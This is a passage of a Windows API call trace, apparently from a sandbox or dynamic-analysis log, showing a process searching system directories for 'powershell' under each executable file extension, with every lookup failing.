	[0746.833] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.833] SetErrorMode (uMode=0x1) returned 0x1
	[0746.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.834] SetErrorMode (uMode=0x1) returned 0x1
	[0746.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.834] SetErrorMode (uMode=0x1) returned 0x1
	[0746.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.835] SetErrorMode (uMode=0x1) returned 0x1
	[0746.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.835] SetErrorMode (uMode=0x1) returned 0x1
	[0746.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.835] SetErrorMode (uMode=0x1) returned 0x1
	[0746.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.836] SetErrorMode (uMode=0x1) returned 0x1
	[0746.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.836] SetErrorMode (uMode=0x1) returned 0x1
	[0746.836] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.836] SetErrorMode (uMode=0x1) returned 0x1
	[0746.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0746.837] SetErrorMode (uMode=0x1) returned 0x1
	[0746.837] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0746.837] SetErrorMode (uMode=0x1) returned 0x1
	[0748.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0748.331] SetErrorMode (uMode=0x1) returned 0x1
	[0748.331] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.331] SetErrorMode (uMode=0x1) returned 0x1
	[0748.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0748.332] SetErrorMode (uMode=0x1) returned 0x1
	[0748.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.332] SetErrorMode (uMode=0x1) returned 0x1
	[0748.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0748.332] SetErrorMode (uMode=0x1) returned 0x1
	[0748.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.333] SetErrorMode (uMode=0x1) returned 0x1
	[0748.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0748.354] SetErrorMode (uMode=0x1) returned 0x1
	[0748.354] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.354] SetErrorMode (uMode=0x1) returned 0x1
	[0748.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0748.355] SetErrorMode (uMode=0x1) returned 0x1
	[0748.355] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.355] SetErrorMode (uMode=0x1) returned 0x1
	[0748.355] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.355] SetErrorMode (uMode=0x1) returned 0x1
	[0748.356] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.356] SetErrorMode (uMode=0x1) returned 0x1
	[0748.356] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.356] SetErrorMode (uMode=0x1) returned 0x1
	[0748.356] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.357] SetErrorMode (uMode=0x1) returned 0x1
	[0748.357] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.357] SetErrorMode (uMode=0x1) returned 0x1
	[0748.357] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.357] SetErrorMode (uMode=0x1) returned 0x1
	[0748.357] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.358] SetErrorMode (uMode=0x1) returned 0x1
	[0748.358] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.358] SetErrorMode (uMode=0x1) returned 0x1
	[0748.358] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.358] SetErrorMode (uMode=0x1) returned 0x1
	[0748.358] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.359] SetErrorMode (uMode=0x1) returned 0x1
	[0748.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.359] SetErrorMode (uMode=0x1) returned 0x1
	[0748.359] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.359] SetErrorMode (uMode=0x1) returned 0x1
	[0748.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.360] SetErrorMode (uMode=0x1) returned 0x1
	[0748.360] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.360] SetErrorMode (uMode=0x1) returned 0x1
	[0748.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.360] SetErrorMode (uMode=0x1) returned 0x1
	[0748.361] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.361] SetErrorMode (uMode=0x1) returned 0x1
	[0748.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.361] SetErrorMode (uMode=0x1) returned 0x1
	[0748.361] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.362] SetErrorMode (uMode=0x1) returned 0x1
	[0748.362] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.362] SetErrorMode (uMode=0x1) returned 0x1
	[0748.362] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.362] SetErrorMode (uMode=0x1) returned 0x1
	[0748.362] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.363] SetErrorMode (uMode=0x1) returned 0x1
	[0748.363] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.363] SetErrorMode (uMode=0x1) returned 0x1
	[0748.363] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.363] SetErrorMode (uMode=0x1) returned 0x1
	[0748.364] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.364] SetErrorMode (uMode=0x1) returned 0x1
	[0748.364] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.364] SetErrorMode (uMode=0x1) returned 0x1
	[0748.364] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.364] SetErrorMode (uMode=0x1) returned 0x1
	[0748.365] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.365] SetErrorMode (uMode=0x1) returned 0x1
	[0748.365] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.365] SetErrorMode (uMode=0x1) returned 0x1
	[0748.365] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0748.366] SetErrorMode (uMode=0x1) returned 0x1
	[0748.366] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.366] SetErrorMode (uMode=0x1) returned 0x1
	[0748.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.366] SetErrorMode (uMode=0x1) returned 0x1
	[0748.366] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.367] SetErrorMode (uMode=0x1) returned 0x1
	[0748.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.367] SetErrorMode (uMode=0x1) returned 0x1
	[0748.367] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.367] SetErrorMode (uMode=0x1) returned 0x1
	[0748.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.368] SetErrorMode (uMode=0x1) returned 0x1
	[0748.368] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.368] SetErrorMode (uMode=0x1) returned 0x1
	[0748.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.368] SetErrorMode (uMode=0x1) returned 0x1
	[0748.368] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.369] SetErrorMode (uMode=0x1) returned 0x1
	[0748.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.369] SetErrorMode (uMode=0x1) returned 0x1
	[0748.369] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c73da20 | out: lpFindFileData=0x1c73da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0748.369] SetErrorMode (uMode=0x1) returned 0x1
	[0748.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c73d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0748.370] SetErrorMode (uMode=0x1) returned 0x1
